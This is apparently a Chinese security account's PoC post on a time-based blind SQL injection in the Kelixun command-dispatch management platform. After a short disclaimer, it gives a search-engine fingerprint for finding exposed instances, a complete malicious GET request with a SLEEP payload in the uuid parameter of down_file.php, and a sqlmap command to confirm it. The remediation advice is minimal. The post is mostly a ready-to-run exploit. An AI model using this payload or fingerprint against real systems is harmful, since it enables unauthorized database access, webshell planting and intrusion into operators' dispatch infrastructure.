更多干货POC获取,请关注公众号:如棠安全
Nx01 阅读须知
如棠安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
Nx02 漏洞描述
福建科立讯通信 指挥调度管理平台SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
Nx03 系统指纹
鹰图:web.body="指挥调度管理平台"
Nx04 产品主页
Nx05 漏洞复现
存在时间盲注
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(7)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
sqlmap验证:python sqlmap.py -u "http://xxx.xxx.xxx.xxx/api/client/down_file.php?uuid=1"
Nx06 修复建议
联系厂商进行系统升级